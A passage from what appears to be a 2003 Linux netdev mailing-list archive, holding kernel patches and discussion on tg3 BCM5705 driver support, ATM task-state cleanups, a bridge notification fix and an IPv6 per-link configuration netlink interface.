tp->dma_rwctrl); +#if 0 + /* Unneeded, already done by tg3_get_invariants. */ + tg3_switch_clocks(tp); +#endif + ret = 0; if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5700 && GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5701) @@ -6592,12 +6923,35 @@ case PHY_ID_BCM5701: return "5701"; case PHY_ID_BCM5703: return "5703"; case PHY_ID_BCM5704: return "5704"; + case PHY_ID_BCM5705: return "5705"; case PHY_ID_BCM8002: return "8002"; case PHY_ID_SERDES: return "serdes"; default: return "unknown"; }; } +static struct pci_dev * __devinit tg3_find_5704_peer(struct tg3 *tp) +{ + struct pci_dev *peer = NULL; + unsigned int func; + + for (func = 0; func < 7; func++) { + unsigned int devfn = tp->pdev->devfn; + + devfn &= ~7; + devfn |= func; + + if (devfn == tp->pdev->devfn) + continue; + peer = pci_find_slot(tp->pdev->bus->number, devfn); + if (peer) + break; + } + if (!peer || peer == tp->pdev) + BUG(); + return peer; +} + static int __devinit tg3_init_one(struct pci_dev *pdev, const struct pci_device_id *ent) { @@ -6751,6 +7105,38 @@ "aborting.\n"); goto err_out_iounmap; } + + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) { + tp->bufmgr_config.mbuf_read_dma_low_water = + DEFAULT_MB_RDMA_LOW_WATER_5705; + tp->bufmgr_config.mbuf_mac_rx_low_water = + DEFAULT_MB_MACRX_LOW_WATER_5705; + tp->bufmgr_config.mbuf_high_water = + DEFAULT_MB_HIGH_WATER_5705; + } + +#if TG3_DO_TSO != 0 + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5700 || + GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5701 || + tp->pci_chip_rev_id == CHIPREV_ID_5705_A0 || + (tp->tg3_flags & TG3_FLAG_ENABLE_ASF) != 0) + dev->features &= ~NETIF_F_TSO; + +#if 1 /* Kill this when 5705 TSO firmware added. */ + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) + dev->features &= ~NETIF_F_TSO; +#endif +#endif + + if (tp->pci_chip_rev_id == CHIPREV_ID_5705_A1 && +#if TG3_DO_TSO != 0 + !(dev->features & NETIF_F_TSO) && +#endif + !(tr32(TG3PCI_PCISTATE) & PCISTATE_BUS_SPEED_HIGH)) + tp->rx_pending = 64; + + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5704) + tp->pdev_peer = tg3_find_5704_peer(tp); err = tg3_get_device_address(tp); if (err) { diff -Nru a/drivers/net/tg3.h b/drivers/net/tg3.h --- a/drivers/net/tg3.h Tue Jul 29 13:08:22 2003 +++ b/drivers/net/tg3.h Tue Jul 29 13:08:22 2003 @@ -24,6 +24,7 @@ #define RX_COPY_THRESHOLD 256 #define RX_STD_MAX_SIZE 1536 +#define RX_STD_MAX_SIZE_5705 512 #define RX_JUMBO_MAX_SIZE 0xdeadbeef /* XXX */ /* First 256 bytes are a mirror of PCI config space. */ @@ -59,7 +60,7 @@ #define PCIX_CAPS_SPLIT_SHIFT 20 #define PCIX_CAPS_BURST_MASK 0x000c0000 #define PCIX_CAPS_BURST_SHIFT 18 -#define PCIX_CAPS_MAX_BURST_5704 2 +#define PCIX_CAPS_MAX_BURST_CPIOB 2 #define TG3PCI_PM_CAP_PTR 0x00000041 #define TG3PCI_X_COMMAND 0x00000042 #define TG3PCI_X_STATUS 0x00000044 @@ -115,11 +116,14 @@ #define CHIPREV_ID_5704_A0 0x2000 #define CHIPREV_ID_5704_A1 0x2001 #define CHIPREV_ID_5704_A2 0x2002 +#define CHIPREV_ID_5705_A0 0x3000 +#define CHIPREV_ID_5705_A1 0x3001 #define GET_ASIC_REV(CHIP_REV_ID) ((CHIP_REV_ID) >> 12) #define ASIC_REV_5700 0x07 #define ASIC_REV_5701 0x00 #define ASIC_REV_5703 0x01 #define ASIC_REV_5704 0x02 +#define ASIC_REV_5705 0x03 #define GET_CHIP_REV(CHIP_REV_ID) ((CHIP_REV_ID) >> 8) #define CHIPREV_5700_AX 0x70 #define CHIPREV_5700_BX 0x71 @@ -180,6 +184,9 @@ #define CLOCK_CTRL_ALTCLK 0x00001000 #define CLOCK_CTRL_PWRDOWN_PLL133 0x00008000 #define CLOCK_CTRL_44MHZ_CORE 0x00040000 +#define CLOCK_CTRL_625_CORE 0x00100000 +#define CLOCK_CTRL_FORCE_CLKRUN 0x00200000 +#define CLOCK_CTRL_CLKRUN_OENABLE 0x00400000 #define CLOCK_CTRL_DELAY_PCI_GRANT 0x80000000 #define TG3PCI_REG_BASE_ADDR 0x00000078 #define TG3PCI_MEM_WIN_BASE_ADDR 0x0000007c @@ -457,17 +464,89 @@ #define MAC_RCV_RULE_CFG 0x00000500 #define RCV_RULE_CFG_DEFAULT_CLASS 0x00000008 #define MAC_LOW_WMARK_MAX_RX_FRAME 0x00000504 -/* 0x504 --> 0x590 unused */ +/* 0x508 --> 0x520 unused */ +#define MAC_HASHREGU_0 0x00000520 +#define MAC_HASHREGU_1 0x00000524 +#define MAC_HASHREGU_2 0x00000528 +#define MAC_HASHREGU_3 0x0000052c +#define MAC_EXTADDR_0_HIGH 0x00000530 +#define MAC_EXTADDR_0_LOW 0x00000534 +#define MAC_EXTADDR_1_HIGH 0x00000538 +#define MAC_EXTADDR_1_LOW 0x0000053c +#define MAC_EXTADDR_2_HIGH 0x00000540 +#define MAC_EXTADDR_2_LOW 0x00000544 +#define MAC_EXTADDR_3_HIGH 0x00000548 +#define MAC_EXTADDR_3_LOW 0x0000054c +#define MAC_EXTADDR_4_HIGH 0x00000550 +#define MAC_EXTADDR_4_LOW 0x00000554 +#define MAC_EXTADDR_5_HIGH 0x00000558 +#define MAC_EXTADDR_5_LOW 0x0000055c +#define MAC_EXTADDR_6_HIGH 0x00000560 +#define MAC_EXTADDR_6_LOW 0x00000564 +#define MAC_EXTADDR_7_HIGH 0x00000568 +#define MAC_EXTADDR_7_LOW 0x0000056c +#define MAC_EXTADDR_8_HIGH 0x00000570 +#define MAC_EXTADDR_8_LOW 0x00000574 +#define MAC_EXTADDR_9_HIGH 0x00000578 +#define MAC_EXTADDR_9_LOW 0x0000057c +#define MAC_EXTADDR_10_HIGH 0x00000580 +#define MAC_EXTADDR_10_LOW 0x00000584 +#define MAC_EXTADDR_11_HIGH 0x00000588 +#define MAC_EXTADDR_11_LOW 0x0000058c #define MAC_SERDES_CFG 0x00000590 #define MAC_SERDES_STAT 0x00000594 /* 0x598 --> 0x600 unused */ #define MAC_TX_MAC_STATE_BASE 0x00000600 /* 16 bytes */ #define MAC_RX_MAC_STATE_BASE 0x00000610 /* 20 bytes */ /* 0x624 --> 0x800 unused */ -#define MAC_RX_STATS_BASE 0x00000800 /* 26 32-bit words */ -/* 0x868 --> 0x880 unused */ -#define MAC_TX_STATS_BASE 0x00000880 /* 28 32-bit words */ -/* 0x8f0 --> 0xc00 unused */ +#define MAC_TX_STATS_OCTETS 0x00000800 +#define MAC_TX_STATS_RESV1 0x00000804 +#define MAC_TX_STATS_COLLISIONS 0x00000808 +#define MAC_TX_STATS_XON_SENT 0x0000080c +#define MAC_TX_STATS_XOFF_SENT 0x00000810 +#define MAC_TX_STATS_RESV2 0x00000814 +#define MAC_TX_STATS_MAC_ERRORS 0x00000818 +#define MAC_TX_STATS_SINGLE_COLLISIONS 0x0000081c +#define MAC_TX_STATS_MULT_COLLISIONS 0x00000820 +#define MAC_TX_STATS_DEFERRED 0x00000824 +#define MAC_TX_STATS_RESV3 0x00000828 +#define MAC_TX_STATS_EXCESSIVE_COL 0x0000082c +#define MAC_TX_STATS_LATE_COL 0x00000830 +#define MAC_TX_STATS_RESV4_1 0x00000834 +#define MAC_TX_STATS_RESV4_2 0x00000838 +#define MAC_TX_STATS_RESV4_3 0x0000083c +#define MAC_TX_STATS_RESV4_4 0x00000840 +#define MAC_TX_STATS_RESV4_5 0x00000844 +#define MAC_TX_STATS_RESV4_6 0x00000848 +#define MAC_TX_STATS_RESV4_7 0x0000084c +#define MAC_TX_STATS_RESV4_8 0x00000850 +#define MAC_TX_STATS_RESV4_9 0x00000854 +#define MAC_TX_STATS_RESV4_10 0x00000858 +#define MAC_TX_STATS_RESV4_11 0x0000085c +#define MAC_TX_STATS_RESV4_12 0x00000860 +#define MAC_TX_STATS_RESV4_13 0x00000864 +#define MAC_TX_STATS_RESV4_14 0x00000868 +#define MAC_TX_STATS_UCAST 0x0000086c +#define MAC_TX_STATS_MCAST 0x00000870 +#define MAC_TX_STATS_BCAST 0x00000874 +#define MAC_TX_STATS_RESV5_1 0x00000878 +#define MAC_TX_STATS_RESV5_2 0x0000087c +#define MAC_RX_STATS_OCTETS 0x00000880 +#define MAC_RX_STATS_RESV1 0x00000884 +#define MAC_RX_STATS_FRAGMENTS 0x00000888 +#define MAC_RX_STATS_UCAST 0x0000088c +#define MAC_RX_STATS_MCAST 0x00000890 +#define MAC_RX_STATS_BCAST 0x00000894 +#define MAC_RX_STATS_FCS_ERRORS 0x00000898 +#define MAC_RX_STATS_ALIGN_ERRORS 0x0000089c +#define MAC_RX_STATS_XON_PAUSE_RECVD 0x000008a0 +#define MAC_RX_STATS_XOFF_PAUSE_RECVD 0x000008a4 +#define MAC_RX_STATS_MAC_CTRL_RECVD 0x000008a8 +#define MAC_RX_STATS_XOFF_ENTERED 0x000008ac +#define MAC_RX_STATS_FRAME_TOO_LONG 0x000008b0 +#define MAC_RX_STATS_JABBERS 0x000008b4 +#define MAC_RX_STATS_UNDERSIZE 0x000008b8 +/* 0x8bc --> 0xc00 unused */ /* Send data initiator control registers */ #define SNDDATAI_MODE 0x00000c00 @@ -812,13 +891,16 @@ #define BUFMGR_MB_POOL_ADDR 0x00004408 #define BUFMGR_MB_POOL_SIZE 0x0000440c #define BUFMGR_MB_RDMA_LOW_WATER 0x00004410 -#define DEFAULT_MB_RDMA_LOW_WATER 0x00000040 +#define DEFAULT_MB_RDMA_LOW_WATER 0x00000050 +#define DEFAULT_MB_RDMA_LOW_WATER_5705 0x00000000 #define DEFAULT_MB_RDMA_LOW_WATER_JUMBO 0x00000130 #define BUFMGR_MB_MACRX_LOW_WATER 0x00004414 #define DEFAULT_MB_MACRX_LOW_WATER 0x00000020 +#define DEFAULT_MB_MACRX_LOW_WATER_5705 0x00000010 #define DEFAULT_MB_MACRX_LOW_WATER_JUMBO 0x00000098 #define BUFMGR_MB_HIGH_WATER 0x00004418 #define DEFAULT_MB_HIGH_WATER 0x00000060 +#define DEFAULT_MB_HIGH_WATER_5705 0x00000060 #define DEFAULT_MB_HIGH_WATER_JUMBO 0x0000017c #define BUFMGR_RX_MB_ALLOC_REQ 0x0000441c #define BUFMGR_MB_ALLOC_BIT 0x10000000 @@ -854,6 +936,8 @@ #define RDMAC_MODE_LNGREAD_ENAB 0x00000200 #define RDMAC_MODE_SPLIT_ENABLE 0x00000800 #define RDMAC_MODE_SPLIT_RESET 0x00001000 +#define RDMAC_MODE_FIFO_SIZE_128 0x00020000 +#define RDMAC_MODE_FIFO_LONG_BURST 0x00030000 #define RDMAC_STATUS 0x00004804 #define RDMAC_STATUS_TGTABORT 0x00000004 #define RDMAC_STATUS_MSTABORT 0x00000008 @@ -877,6 +961,7 @@ #define WDMAC_MODE_FIFOURUN_ENAB 0x00000080 #define WDMAC_MODE_FIFOOREAD_ENAB 0x00000100 #define WDMAC_MODE_LNGREAD_ENAB 0x00000200 +#define WDMAC_MODE_RX_ACCEL 0x00000400 #define WDMAC_STATUS 0x00004c04 #define WDMAC_STATUS_TGTABORT 0x00000004 #define WDMAC_STATUS_MSTABORT 0x00000008 @@ -1141,6 +1226,7 @@ #define GRC_MISC_CFG_BOARD_ID_5704CIOBE 0x00004000 #define GRC_MISC_CFG_BOARD_ID_5704_A2 0x00008000 #define GRC_MISC_CFG_BOARD_ID_AC91002A1 0x00018000 +#define GRC_MISC_CFG_KEEP_GPHY_POWER 0x04000000 #define GRC_LOCAL_CTRL 0x00006808 #define GRC_LCLCTRL_INT_ACTIVE 0x00000001 #define GRC_LCLCTRL_CLEARINT 0x00000002 @@ -1275,6 +1361,7 @@ #define NIC_SRAM_DATA_CFG_WOL_ENABLE 0x00000040 #define NIC_SRAM_DATA_CFG_ASF_ENABLE 0x00000080 #define NIC_SRAM_DATA_CFG_EEPROM_WP 0x00000100 +#define NIC_SRAM_DATA_CFG_MINI_PCI 0x00001000 #define NIC_SRAM_DATA_CFG_FIBER_WOL 0x00004000 #define NIC_SRAM_DATA_PHY_ID 0x00000b74 @@ -1312,6 +1399,8 @@ #define NIC_SRAM_MBUF_POOL_BASE 0x00008000 #define NIC_SRAM_MBUF_POOL_SIZE96 0x00018000 #define NIC_SRAM_MBUF_POOL_SIZE64 0x00010000 +#define NIC_SRAM_MBUF_POOL_BASE5705 0x00010000 +#define NIC_SRAM_MBUF_POOL_SIZE5705 0x0000e000 /* Currently this is fixed. */ #define PHY_ADDR 0x01 @@ -1823,6 +1912,7 @@ #define TG3_FLAG_INIT_COMPLETE 0x80000000 u32 tg3_flags2; #define TG3_FLG2_RESTART_TIMER 0x00000001 +#define TG3_FLG2_NO_ETH_WIRE_SPEED 0x00000002 u32 split_mode_max_reqs; #define SPLIT_MODE_5704_MAX_REQ 3 @@ -1867,6 +1957,7 @@ #define PHY_ID_BCM5701 0x60008110 #define PHY_ID_BCM5703 0x60008160 #define PHY_ID_BCM5704 0x60008190 +#define PHY_ID_BCM5705 0x600081a0 #define PHY_ID_BCM8002 0x60010140 #define PHY_ID_SERDES 0xfeedbee0 #define PHY_ID_INVALID 0xffffffff @@ -1879,6 +1970,9 @@ enum phy_led_mode led_mode; char board_part_number[24]; + u32 nic_sram_data_cfg; + u32 pci_clock_ctrl; + struct pci_dev *pdev_peer; /* This macro assumes the passed PHY ID is already masked * with PHY_ID_MASK. @@ -1887,6 +1981,7 @@ ((X) == PHY_ID_BCM5400 || (X) == PHY_ID_BCM5401 || \ (X) == PHY_ID_BCM5411 || (X) == PHY_ID_BCM5701 || \ (X) == PHY_ID_BCM5703 || (X) == PHY_ID_BCM5704 || \ + (X) == PHY_ID_BCM5705 || \ (X) == PHY_ID_BCM8002 || (X) == PHY_ID_SERDES) struct tg3_hw_stats *hw_stats; diff -Nru a/include/linux/pci_ids.h b/include/linux/pci_ids.h --- a/include/linux/pci_ids.h Tue Jul 29 13:08:22 2003 +++ b/include/linux/pci_ids.h Tue Jul 29 13:08:22 2003 @@ -1646,6 +1646,8 @@ #define PCI_DEVICE_ID_TIGON3_5703 0x1647 #define PCI_DEVICE_ID_TIGON3_5704 0x1648 #define PCI_DEVICE_ID_TIGON3_5702FE 0x164d +#define PCI_DEVICE_ID_TIGON3_5705 0x1653 +#define PCI_DEVICE_ID_TIGON3_5705M 0x165d #define PCI_DEVICE_ID_TIGON3_5702X 0x16a6 #define PCI_DEVICE_ID_TIGON3_5703X 0x16a7 #define PCI_DEVICE_ID_TIGON3_5704S 0x16a8 From chas@locutus.cmf.nrl.navy.mil Tue Jul 29 10:45:25 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 10:45:30 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6THjOFl029407 for ; Tue, 29 Jul 2003 10:45:25 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6THjIsG028329; Tue, 29 Jul 2003 13:45:20 -0400 (EDT) Message-Id: <200307291745.h6THjIsG028329@ginger.cmf.nrl.navy.mil> To: bellucda@tiscali.it Cc: davem@redhat.com, netdev@oss.sgi.com Subject: Re: [PATCH] replace current->state = x with set_current_state(x) in drivers/atm/* [2.6.0-test1] In-reply-to: Your message of "Fri, 25 Jul 2003 20:42:35 +0200." <200307252042.35832.bellucda@tiscali.it> Date: Tue, 29 Jul 2003 13:42:36 -0400 From: chas williams X-Spam-Score: () hits=-2.9 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang) X-archive-position: 4367 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev dave, please apply this to the 2.6 tree. In message <200307252042.35832.bellucda@tiscali.it>,Daniele Bellucci writes: >Hi Chas, >ACME told me to post my patches to you .... > >please tell'me if correct. [atm]: use set_current_state(x) (from bellucda@tiscali.it) # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1598 -> 1.1599 # drivers/atm/firestream.c 1.18 -> 1.19 # drivers/atm/atmtcp.c 1.15 -> 1.16 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/07/29 chas@relax.cmf.nrl.navy.mil 1.1599 # use set_current_state(x) (from bellucda@tiscali.it) # -------------------------------------------- # diff -Nru a/drivers/atm/atmtcp.c b/drivers/atm/atmtcp.c --- a/drivers/atm/atmtcp.c Tue Jul 29 13:41:18 2003 +++ b/drivers/atm/atmtcp.c Tue Jul 29 13:41:18 2003 @@ -77,7 +77,7 @@ set_current_state(TASK_UNINTERRUPTIBLE); schedule(); } - current->state = TASK_RUNNING; + set_current_state(TASK_RUNNING); remove_wait_queue(vcc->sk->sk_sleep, &wait); return error; } diff -Nru a/drivers/atm/firestream.c b/drivers/atm/firestream.c --- a/drivers/atm/firestream.c Tue Jul 29 13:41:18 2003 +++ b/drivers/atm/firestream.c Tue Jul 29 13:41:18 2003 @@ -1722,7 +1722,7 @@ } /* Try again after 10ms. */ - current->state = TASK_UNINTERRUPTIBLE; + set_current_state(TASK_UNINTERRUPTIBLE); schedule_timeout ((HZ+99)/100); } From chas@locutus.cmf.nrl.navy.mil Tue Jul 29 10:59:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 10:59:59 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6THxoFl030465 for ; Tue, 29 Jul 2003 10:59:51 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6THxlsG028613; Tue, 29 Jul 2003 13:59:47 -0400 (EDT) Message-Id: <200307291759.h6THxlsG028613@ginger.cmf.nrl.navy.mil> To: davem@redhat.com cc: netdev@oss.sgi.com Subject: [PATCH][ATM][2.4] export try_atm_clip_ops not atm_clip_ops_mutex Reply-To: chas3@users.sourceforge.net Date: Tue, 29 Jul 2003 13:57:05 -0400 From: chas williams X-Spam-Score: () hits=0.5 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang) X-archive-position: 4368 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev please apply to 2.4 -- thanks [atm]: export try_atm_clip_ops not atm_clip_ops_mutex # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1037 -> 1.1038 # net/atm/common.c 1.29 -> 1.30 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/07/22 chas@relax.cmf.nrl.navy.mil 1.1038 # export try_atm_clip_ops not atm_clip_ops_mutex # -------------------------------------------- # diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Tue Jul 29 13:58:11 2003 +++ b/net/atm/common.c Tue Jul 29 13:58:11 2003 @@ -124,7 +124,7 @@ #ifdef CONFIG_ATM_CLIP_MODULE EXPORT_SYMBOL(atm_clip_ops); -EXPORT_SYMBOL(atm_clip_ops_mutex); +EXPORT_SYMBOL(try_atm_clip_ops); EXPORT_SYMBOL(atm_clip_ops_set); #endif #endif From shemminger@osdl.org Tue Jul 29 17:08:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 17:08:14 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6U086Fl027246 for ; Tue, 29 Jul 2003 17:08:08 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6U07GI16180; Tue, 29 Jul 2003 17:07:18 -0700 Date: Tue, 29 Jul 2003 17:07:15 -0700 From: Stephen Hemminger To: Steffen Klassert , Christian Mautner , "David S. Miller" , Andrew Morton Cc: netdev@oss.sgi.com Subject: [PATCH] Fix bridge notification processing Message-Id: <20030729170715.7ff9bbc7.shemminger@osdl.org> In-Reply-To: <20030724102821.GA32274@gareth.mathematik.tu-chemnitz.de> References: <20030722234508.0af40e80.shemminger@osdl.org> <20030724033430.GA20304@mautner.ca> <20030724102821.GA32274@gareth.mathematik.tu-chemnitz.de> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4369 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev On Thu, 24 Jul 2003 12:28:21 +0200 Steffen Klassert wrote: > I probably found the problem. > If I do > > brctl addbr br0 > brctl addif br0 eth0 > brctl addif br0 eth1 > ifconfig eth0 up > ifconfig eth1 up > ifconfig br0 up The bridge needs to ignore up/down notifications when it is down (like 2.4); somewhere with all the other changes I put in, a bug got in and it was looking at networks when the bridge is down. When bridge comes up it scans and sees the state... This applies against 2.6.0-test2 (i.e. after my earlier fixup patch). diff -Nru a/net/bridge/br_notify.c b/net/bridge/br_notify.c --- a/net/bridge/br_notify.c Tue Jul 29 17:01:45 2003 +++ b/net/bridge/br_notify.c Tue Jul 29 17:01:45 2003 @@ -39,19 +39,23 @@ br = p->br; spin_lock_bh(&br->lock); + switch (event) { case NETDEV_CHANGEADDR: br_fdb_changeaddr(p, dev->dev_addr); - br_stp_recalculate_bridge_id(br); + if (br->dev->flags & IFF_UP) + br_stp_recalculate_bridge_id(br); break; case NETDEV_DOWN: - br_stp_disable_port(p); + if (br->dev->flags & IFF_UP) + br_stp_disable_port(p); break; case NETDEV_UP: - br_stp_enable_port(p); + if (br->dev->flags & IFF_UP) + br_stp_enable_port(p); break; case NETDEV_UNREGISTER: From krkumar@us.ibm.com Tue Jul 29 17:38:03 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 17:38:29 -0700 (PDT) Received: from e6.ny.us.ibm.com (e6.ny.us.ibm.com [32.97.182.106]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6U0buFl029493 for ; Tue, 29 Jul 2003 17:38:03 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e6.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6U0aQkh174948; Tue, 29 Jul 2003 20:36:26 -0400 Received: from linux-udp11864790uds.beaverton.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6U0aMev093646; Tue, 29 Jul 2003 20:36:23 -0400 Date: Tue, 29 Jul 2003 17:33:03 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430 To: "David S. Miller" cc: kuznet@ms2.inr.ac.ru, , Subject: Re: O/M flags against 2.6.0-test1 In-Reply-To: <20030724000705.4662df54.davem@redhat.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4370 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev > Another idea is to define the user structure: > > struct ipv6_kernel_devconf { > struct ipv6_user_devconf vals; > void *sysctl; > }; After the latest suggestion to use array instead of a structure, the patch being submitted doesn't make this change. I hope that is acceptable. > > > 3) Change "int" members of struct "ipv6_devconf" to "s32". > > > > All members (except use_tempaddr) seem to be >=0, should I change > > the definition to __u32 instead ? > > __u32 sounds fine. Since use_tempaddr can be -1, I am for the time being keeping all the variables as s32. If this is changed to __u32, then some code in addrconf.c needs to be modified. > I think something more like route metrics, ie. an array is more appropriate I guess you mean only the user interface to use route type metrics, not modify the existing cnf implementation to use this concept (eg remove the structure and define cnf_metrics[] with code similar to RTAX_HOPLIMIT, etc). So this patch doesn't change the usage in kernel, except now the user interface returns the config params in an array format. This patch applies on top of the prefix list patch. Thanks, - KK PS : Alexey's patch for ipv4 defines IFLA_INET_MAX as IFLA_INET_CONF, probably that should be IFLA_INET_MCAST. Another thing that confused me is that there is no addrconf_sysctl_register for ipv6_devconf, while it is being unregister'd (which would fail?). ------------------------------------------------------------------------------ diff -ruN 1/linux-2.6.0-test1.plist/include/linux/ipv6.h linux-2.6.0-test1.new/include/linux/ipv6.h --- 1/linux-2.6.0-test1.plist/include/linux/ipv6.h 2003-07-13 20:36:33.000000000 -0700 +++ linux-2.6.0-test1.new/include/linux/ipv6.h 2003-07-29 17:02:57.000000000 -0700 @@ -122,6 +122,30 @@ struct in6_addr daddr; }; +/* + * This structure contains configuration options per IPv6 link. + */ +struct ipv6_devconf { + s32 forwarding; + s32 hop_limit; + s32 mtu6; + s32 accept_ra; + s32 accept_redirects; + s32 autoconf; + s32 dad_transmits; + s32 rtr_solicits; + s32 rtr_solicit_interval; + s32 rtr_solicit_delay; +#ifdef CONFIG_IPV6_PRIVACY + s32 use_tempaddr; + s32 temp_valid_lft; + s32 temp_prefered_lft; + s32 regen_max_retry; + s32 max_desync_factor; +#endif + void *sysctl; +}; + #ifdef __KERNEL__ #include /* struct sockaddr_in6 */ #include diff -ruN 1/linux-2.6.0-test1.plist/include/linux/rtnetlink.h linux-2.6.0-test1.new/include/linux/rtnetlink.h --- 1/linux-2.6.0-test1.plist/include/linux/rtnetlink.h 2003-07-29 12:05:26.000000000 -0700 +++ linux-2.6.0-test1.new/include/linux/rtnetlink.h 2003-07-29 14:49:16.000000000 -0700 @@ -477,10 +477,12 @@ #define IFLA_MASTER IFLA_MASTER IFLA_WIRELESS, /* Wireless Extension event - see wireless.h */ #define IFLA_WIRELESS IFLA_WIRELESS + IFLA_PROTINFO, /* Protocol specific information per link */ +#define IFLA_PROTINFO IFLA_PROTINFO }; -#define IFLA_MAX IFLA_WIRELESS +#define IFLA_MAX IFLA_PROTINFO #define IFLA_RTA(r) ((struct rtattr*)(((char*)(r)) + NLMSG_ALIGN(sizeof(struct ifinfomsg)))) #define IFLA_PAYLOAD(n) NLMSG_PAYLOAD(n,sizeof(struct ifinfomsg)) @@ -514,6 +516,18 @@ for IPIP tunnels, when route to endpoint is allowed to change) */ +/* Subtype attributes for IFLA_PROTINFO */ +enum +{ + IFLA_INET6_UNSPEC, + IFLA_INET6_FLAGS, /* link flags */ + IFLA_INET6_CONF, /* sysctl parameters */ + IFLA_INET6_STATS, /* statistics */ + IFLA_INET6_MCAST, /* MC things. What of them? */ +}; + +#define IFLA_INET6_MAX IFLA_INET6_MCAST + /***************************************************************** * Traffic control messages. ****/ diff -ruN 1/linux-2.6.0-test1.plist/include/net/if_inet6.h linux-2.6.0-test1.new/include/net/if_inet6.h --- 1/linux-2.6.0-test1.plist/include/net/if_inet6.h 2003-07-13 20:38:43.000000000 -0700 +++ linux-2.6.0-test1.new/include/net/if_inet6.h 2003-07-29 16:28:56.000000000 -0700 @@ -16,6 +16,7 @@ #define _NET_IF_INET6_H #include +#include #define IF_RA_RCVD 0x20 #define IF_RS_SENT 0x10 @@ -132,28 +133,6 @@ #define IFA_SITE IPV6_ADDR_SITELOCAL #define IFA_GLOBAL 0x0000U -struct ipv6_devconf -{ - int forwarding; - int hop_limit; - int mtu6; - int accept_ra; - int accept_redirects; - int autoconf; - int dad_transmits; - int rtr_solicits; - int rtr_solicit_interval; - int rtr_solicit_delay; -#ifdef CONFIG_IPV6_PRIVACY - int use_tempaddr; - int temp_valid_lft; - int temp_prefered_lft; - int regen_max_retry; - int max_desync_factor; -#endif - void *sysctl; -}; - struct ipv6_devstat { struct proc_dir_entry *proc_dir_entry; DEFINE_SNMP_STAT(struct icmpv6_mib, icmpv6); diff -ruN 1/linux-2.6.0-test1.plist/net/ipv6/addrconf.c linux-2.6.0-test1.new/net/ipv6/addrconf.c --- 1/linux-2.6.0-test1.plist/net/ipv6/addrconf.c 2003-07-29 12:05:26.000000000 -0700 +++ linux-2.6.0-test1.new/net/ipv6/addrconf.c 2003-07-29 15:54:42.000000000 -0700 @@ -2510,7 +2510,112 @@ netlink_broadcast(rtnl, skb, 0, RTMGRP_IPV6_IFADDR, GFP_ATOMIC); } +static int inline ipv6_store_devconf(struct ipv6_devconf *cnf, int *array) +{ + int i = 0; + + array[i++] = cnf->forwarding; + 